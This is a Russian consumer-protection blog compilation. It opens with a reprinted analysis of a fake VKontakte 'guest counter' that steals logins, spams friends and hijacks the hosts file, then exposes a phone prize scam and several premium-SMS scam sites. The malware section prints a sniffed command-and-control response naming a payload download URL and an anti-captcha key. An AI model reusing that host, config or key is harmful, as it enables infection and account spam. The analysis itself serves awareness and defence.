Благодарим за статью хабрапользователя Onthar!
Орфография авторская.

Здравствуйте. Не так давно я писал про рассылку зловредов по социальной сети «Вконтакте». Не так давно встретился новый, в общем-то похожий случай…
Кинули мне на анализ некий файлик VKGuests.exe, который должен показать кто посещает страничку вконтакте. Скачан файл был с сайта vko-blog.ru, ссылка на который пришла от друга. Жалоба была на то, что «пропал интернет». Любопытно. Ковыряем.

Прежде чем соваться к файлу, было бы интересно почитать, что пишут на том сайте.
Видим классическую замануху об «уникальности нашей программы» от якобы Павла Дурова.
Все ясно) В самом низу синяя кнопка «Установить счетчик», при нажатии на которую, собственно, и предлагается скачать VKGuests.exe.
Файл представляет из себя PE-бинарник, весом в 2 230 040 байт, защищен DotFix NicеProtect.
На момент проверки детектировался на virustotal 12/42

Пробуем запустить, нас встречает симпатичного вида окно, рекомендующее закрыть все браузеры для стопроцентной работы этого «счетчика». Закрываем браузер, нажимаем OK. Открывается не менее красивое окно с полями для ввода логина/пароля учетки вконтакте.


Берем в руки сниффер, вводим данные от балды. При вводе логина не в виде электронного ящика — ссылается на ошибку. Попробуем изобразить почту, к примеру 1111@mail.ru, пароль должен быть не короче 6 символов.

Сниффер поймал коннект с адресом 91.193.194.113, который никак не относится к уютному контактику.
Содержимое сесcии:

GET /stat/config.txt HTTP/1.1
Host: sjhgjjd.ru
Accept: text/html, */*
Accept-Encoding: gzip,deflate, identity
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 16:22:10 GMT
Server: Apache/2
Last-Modified: Sun, 01 May 2011 10:42:57 GMT
ETag: «5c01b-b4-4a23491ebee40»
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 158
Content-Type: text/plain

«timeout»:«0»
«photo_url»:«hxxp://cs10358.vkontakte.ru/u7041153/133719745/x_07e5f13b.jpg»
«file_url»:«hxxp://sjhgjjd.ru/install_msi.exe»
«ac_key»:«15f8a3de833b23fd150188ddd3d1f9d7»

Аха, выдаются для скачивания любопытные вещи: ссылка на странный файл с непонятного адреса, ссылка на картинку с кратким содержанием того блога, о котором говорилось вначале и ключ от сервиса антикапчи, используемый для спама/флуда систем, защищенных капчей. Ну, я подобным я как-то сталкивался. Закрываем VKGuests.exe к чертям и скачиваем файл по ссылке самостоятельно.

Перед нами сжатый с помощью UPX файл install_msi.exe, весом в 179 200 байт. Снимаем UPX, и предстает перед нами исполняемый, скомпилированный в PureBasic, весом 198 656 байт.

запакованный
распакованный

Едем далее — глядим ресурсы подопытного, где обнаруживаем, конечно же, обфусцированный батник, меняющий хостс-файл.

При обращении к заблокированным сайтам нам предложат заплатить через терминал Qiwi денег на счета вебмани:

В общем-то для лечения стоит только удалить оба файла hosts из c:\windows\system32\drivers\etc\ (один из них будет скрыт, в другом одна буква — не латинская.

Но что будет, если бы мы ввели реальные данные в самом начале эксперимента?
Вводим правильные данные, программа начинает активно скачивать из сети «недостающие компоненты», которые были описаны выше.



Затем долго «думает», рассылая спам, и перезагружает компьютер.
Я уже говорил, что этот вредоносный пакет получает ключ для антикапчи, так вот он используется для массового отмечания всех друзей на фото, добавленного в профиль той учетки, данные которой были введены. Не исключено, что логин и пароль, переданные на сервер точно так же, автоматически, будут использоваться для дальнейшего спама.

Вирус не резидентный, поэтому после перезагрузки он не только не продолжает работу, но еще и удаляется из системы, прихватывая за собой все барахло, которое было скачано. Ну, кроме подмененного hosts =)

Собственно все. Более ничего интересного из этого зловреда выжать не удалось, да и не хотелось.

Ссылка на оригинал: http://habrahabr.ru/blogs/virus/118815/

Еще раз от нас спасибо. Люди, будьте бдительны.

Хай, честные люди!

Если вы увидели на каком-либо сайте наш логотип или значок и этого сайта нет в списке Проверенные сайты — знайте — это развод.

Сайт, на котором разводят людей — visibal.ru



Они продают, якобы, сайты, баннеры, взламывают страницы ВКонтакте, барыжат номерами ICQ, создают флеш-игры. Ничего у них не покупайте, они разместили наш баннер без всяких проверок. Просим заметить и тот факт, что мы не сотрудничаем с сайтами такой тематики.

Мы не являемся друзьями мошеннических сайтов, а мошенники, занимающиеся таким недобросовестным делом, должны икать до конца жизни.

Предыстория:
Моему другу пришло голосовое сообщение от номера 9121577124 о том, что он выиграл приз от Русского Радио. Номер я специально публикую, потому что я уверен на 100%, что это — развод. В виду того, что у него не было возможности позвонить на этот номер — он поручил провести сие действие мне. Поскольку номер друга мне не принадлежит (логично, да?) и есть подозрение, что указанный телефонный номер в сообщении, якобы Русского Радио, платный — было решено осуществить звонок через Skype.

MXSkypeRecorder мне в этом помог. Сразу приношу извинения за качество звука, за формат его подачи (как сделать маленький плеер — не разобрался). Часть разговора потерялась из-за триальной версии программы, эту часть я опишу отдельно. Так же эта замечательная программка во второй части нашего диалога изменила мне тембр голоса. Ну я не обижаюсь. Может быть с дикцией у меня тоже проблема — здесь ничего не могу поделать. Дальше 2 файла с записями и текст.

Часть 1:
Что насторожило с первой минуты звонка — обильное употребление «то есть», чем меня и заразил, слова «чо» и тем, что оператор не представился. Оператор сходу выдал мне 500 слов о том, что компания проводит розыгрыш от «Русского Радио» и мой номер попал в список счастливчиков, перечислил всех известных спонсоров (DHL, Samsung). Типичная схема. Все, чтобы жертва максимально быстро стала доверять мошенникам.
Разговор прервался (да и к лучшему, звукозапись была выключена). Перезваниваю, нет ответа. Я настырный. Перезваниваю еще раз, звучит приятная музыка, на фоне слышны мои клики (в это время сёрфил чего-то).

Тут я допустил первую ошибку, что должно было насторожить оператора. Я, представившись Андреем, сказал, что пришло СМС, но пришло на самом деле голосовое сообщение. Но, видимо, денег хочется, и на кое-что можно и закрыть глаза. Номер телефона и все свои адреса я запикал звуками джекпота из игровых автоматов. 30 секунд мучительного ожидания проверки по базе моего телефона и вот оно счастье: мне рассказали, что я выиграл компьютер на базе процессора Intel Pentium марки Samsung (дзинь!).

DHL — курьерская доставка, Евротелеком — спонсор, Samsung — компьютер. Включаем дурака. Хотим забрать приз.

(3,22 Мb), зеркало 1


Мне предложили 2 варианта. Можно забрать приз, приехав в офис по указанному адресу или забрать денежный, цитата: эквАвалент. Что было бы, если приехать в офис — непонятно. Я решил забрать деньги. 112 000 все-таки немалые деньги, да и компьютер у меня есть. Мне рассказали, что я могу дать свои реквизиты, которые они направят в банк и цитата: «ихние» сотрудники скажут мне что делать.

Вот здесь и прерывается первая часть. Что было между 1 и 2 — рассказываю ниже:

Часть 1,5. Потерянный звук:
Оператор, представляющий компанию Русское Радио вдруг начал представлять компанию Евротелеком. Второй промах оператора. Он рассказал, что терминалы моментальной оплаты у них расположенны по всей РФ. И единственное условие для получения моих кровных 112 тысяч рублей — небольшой денежный перевод. То есть — основной момент получения прибыли мошенниками.

Часть 2. Денежный перевод:
Мне предложили пополнить баланс своего телефонного счёта через их терминал. Сумма, которую мне нужно было перевести — 3000 рублей. Не знаю каким образом они получат свои денежки, но мне кажется, что это — комиссия за использование терминала моментальной оплаты.

Оператор слёзно просил сохранить чек и ни в коем случае не выкидывать. Его, мол, я и буду предъявлять, чтобы забрать свои выигранные деньги. Чек является юридическим документом, бла-бла-бла. У оператора появляется южный акцент. Чек предъявляем кассиру, который будет нас обслуживать, сообщаем свою информацию, паспортные данные, получаем денежный эквивалент.

Уточняем информацию, чтобы ничего не потерялось, уточняем как я все же стал счастливчиком. Включаем дурака еще раз. Из 200 номеров — я единственный, компьютер молодец, поделил номера на 10 призовых и я выиграл.

(3,19Mb), зеркало 2


3 ошибка оператора: нужно срочно перевести деньги, прямо в течение часа. Если я не успею — он не предоставит информацию генеральным спонсорам (хотя генеральным спонсором представлялась сама компания Евротелеком). Они работают до 17 часов. Зовут оператора Михаил Киселёв.

Мы распрощались с оператором, он обещал перезвонить. Извините, но я не выдержал после слова: «Паздравлйяйэм».

4 ошибка оператора. Несовпадение данных. В течение часа с этого же номера на номер друга поступает звонок:

О: Здравствуйте еще раз. Вот мы с вами разговаривали, вы согласны с нашими условиями?
Д: Здравствуйте. Уточните еще раз? (поскольку разговаривал по телефону я, а друг лишь дал номер — ему ничего неизвестно об этом, а сообщить я еще не успел. Но он не растерялся и беседа продолжилась).
О: Конечно. Много текста. Нужно приехать и пополнить баланс. Все дела.
Д: Скажите пожалуйста адрес вашего офиса?
О: ул. Академика Королева 11.
— по карте — частный дом, адрес не совпадает с названным в первой части расследования.
Д: Как вас зовут?
О: Михаил Киселёв.
Д: Скажите адрес вашего сайта.
О: Я не могу дать вам такой информации.
Д: В случае возникновения каких-либо спорных моментов, можем звонить в отдел «К»?
О: Аааа, оооо, ээээ. Пик-пик-пик-пик.

Мораль сей басни. Не звоните на номера со своих мобильных — элементарно могут быть платными. И всегда уточняйте информацию у достоверных источников (Русское Радио или любых других).

Запомните, с 9121577124 звонят мошенники. Спасибо за внимание.

UPD : Номер телефона, с которого второй раз перезванивали — 9129412497. Не звоните туда тоже. Принадлежат к Республике Коми. Линк

Уважаемые Абоненты. На Ваши мобильные номера могут приходить СМС сообщения от мошенников с номеров +79041******

(оператор Парма-Мобайл республика Коми), или с номеров МТС московского региона о том, что вы, якобы, выиграли различные ценные призы, и с просьбой перезвонить по определившемуся номеру для уточнения подробностей. Мошенники, как вариант, могут представляться филиалом ЗАО «Евротелеком» в различных городах. После междугороднего звонка вас под разными предлогами будут просить заплатить тем или иным способом деньги. Призываем вас быть бдительными и не покупаться на уловки мошенников.

С уважением, Администрация ЗАО «Евротелеком»

Оригинал статьи: habrahabr.ru/blogs/telecom/90733/

Вот такая вот печальная статистика:

Письмо от внимательного абонента:

Добрый день.
Вы пишите, что
chudo-dieta.com — составление индивидуальных диет по вашим характеристикам.
всё без развода.

Они указывают стоимость услуги в 150 рублей и предлагают отправить sms на номер 2476

Смотрим на сайт
www.mts.ru/services/short_numbers/2476
Информация о коротком номере
Короткий номер: 2476
Название контент-провайдера: ИнкорМедиа, ООО
Стоимость услуги в руб., с учётом НДС: 203,2руб.с НДС
Телефон службы техподдержки, часы работы:
www.incoremedia.ru
E-mail: helpdesk@incoremedia.ru
Tелефон: (495) 982 38 86, круглосуточно

Итого 63 рубля где-то теряются.

Больше не будем их добавлять к себе в проверенные сайты. Не бу-дем.

Наш постоянный партнёр smsrent.ru намедни опубликовал новость следующего содержания:

Уважаемые партнеры!

Спешим поздравить с наступлением весны и напомнить, что наша компания работает на территории РФ и полностью подчиняется законам этой страны. В частности, уведомляем, что законодательно в России запрещена организация благотворительных акций посредствам SMS-платежей. Любая благотворительная деятельность на премиум-номерах противоречит сразу трем законам — «О банках и банковской деятельности», «О противодействии отмыванию доходов», и закону «О деятельности по приему платежей физических лиц». Данная ситуация вызвана тем, что биллинговая платформа ОСС не позволяет предоставлять контент-провайдерам номера в пользование без вычета собственной комиссии, что в свою очередь, не позволяет благотворительному фонду получать всю перечисляемую абонентом сумму.

До внесения поправок в вышеупомянутые законы компетентным органами, правилами СМСРЕНТ строго запрещено использование номеров в благотворительных целях. В случае выявления Службой безопасности фактов нарушения данного правила партнером, к нарушителю будут применены санкции, вплоть до блокировки аккаунта с системе.

Так что знайте. Отправляя СМС в целях благотворительности — вы содействуете нарушителям закона (сразу трём законам).

Пример от «Вестей»:

Сейчас я вам расскажу, что делать, если вы попались на мошенничество с использованием этого короткого номера. Так уж повелось, что номер 7122 (наряду с 3649) — одни из самых давних номеров, который используется недобросоветсными партнёрами компании paystream.ru.

Прежде чем писать гневные жалобы во все биллинги, которые используют короткий номер 7122 — напрямую обратимся к владельцу короткого номера. Напомню, что ваши оскорбления и необоснованные претензии у смс-биллингов никакого желание рассматривать нет (если они невиновны — вы ничего не добьетесь, а более того, потеряете свои деньги, кучу нервных клеток и помощь в поиске мошенников и ответственных за развод лиц).

У агрегатора paystream.ru есть служба поддержки, расположенная по адресу payhelp.ru. Туда и проследуем.


( Читать дальше )

Наткнулся на мошеннический сайт probey-cheloveka.ru, который якобы предоставляет возможность найти человека по номеру его мобильного телефона.

Введем номер телефона, который МТС использует для примера: 8-916-777-88-99.

После долгих мыслительных операций, высший разум выдаст нам:


Вот так вот. Вся работа службы безопасности нафик, милиция бездари, искать человека нужно вот так. 200 рублей (а именно столько стоят 2 смс, которые предлагают отправить на короткий номер 8385) и вся информация у тебя.

Однако есть один момент. Заглянув в код страницы, мы видим, что СМС потребуется все-таки 3. Первая с кодом, вторая для подтверждения, а третья — для того, чтобы вы подтвердили то, что достигли возраста в 18 лет.

Скриншот в подарок:


Правила сервиса говорят о том, что они вообще ни за что не отвечают (за правдивость информации, за её получение, за то, что вы получите то, что не указано в списке БД). Не попадайтесь на развод, друзья мои.

3D-кинотеатр у вас дома! 3d-home-cinema.ru, он же — 3dfilm-doma.ru

Вся история создания 3D-изображения нафик, Кэмерон бездарь, 3D делается вот так:



Любой фильм продемонстрировать в 3D просто невозможно. Изначально, если фильм на это рассчитан — он монтируется и создается по-другому. Подробнее о создании стерео-изображения ищите на просторах интернетов.

Смешные выдержки с сайта мошенников с моими комменатриями:

Программа представляет из себя универсальный проигрыватель с прилагающимся драйвером для всех типов видеокарт, который позволит получать объёмное изображение на экране домашнего монитора.

Универсальных драйверов для всех видеокарт не бывает. Запомните раз и на всегда.

По понятным причинам мы не выкладываем никаких скриншотов и изображений — 3D-картинку способен воспринять только человеческий глаз и только в процессе просмотра фильма с помощью установленной программы.

— Бредятина. Достаточно одной картинки или скриншота (точнее двух). Принцип их схож как и с картинками стереопар (только там глаза косить надо, а тут — в очки смотреть).

Для скачивания бредовой программы нам предлагают отправить СМС с текстом 693651 на короткий номер 1171.


Причем, нам прямо, без стеснения предлагают отправить 2 СМС стоимостью 186 рублей на короткий номер 1171. А вы знаете какие ограничения у операторов? Правильно, не более 300 рублей в час. То есть за час вы не сможете отправить более 1 СМС на этот номер с одного телефонного аппарата. Ну и вывод — ничего не получите. А если и получите — то у вас не будет видно никакого эффекта от просмотра любимых фильмов. Не поддавайтесь на развод. Будьте бдительны.

Здравствуйте, уважаемые создатели очень нужного сайта!
На наш адрес постоянно поступают письма от обманутых абонентов. На сей раз пришло следующее письмо:

Спасибо вам, что вы есть. Жаль только, что не видела вас раньше (( Развели на 307р (((

ВОт этот сайт предлагает установить jimm на мобильный всего за 4 рубля.
konstruktor-jimm.ru

(((((( И вернуть деньги никак. Хотя все запринтскринила и сохранила свой баланс (( В суд на них падать!

Спасибо вам еще раз!!! Буду всем ваш сайт рекламировать!

После захода на страницу нам предлагают собрать свой собственный jimm, произведя нехитрые манипуляции по выбору оформления, смайликов и звукового сопровождения.

Выполнив все операции, выбрав модель телефона — нам предложат отправить смс на короткий номер 7122, которое с их слов стоит 5 4 рубля. Как всегда со звездочкой. Напоминаем, что jimm является бесплатным мессенджером, а стоимость отправки смс на короткий номер 7122 составляет 300 рублей.


Сейчас у всех биллингов запрещено указывать неточную стоимость СМС на своих сайтах, следовательно — сайт konstructor-jimm.ru является мошенническим. Не попадайтесь на развод и старайтесь заранее уточнять стоимость коротких номеров.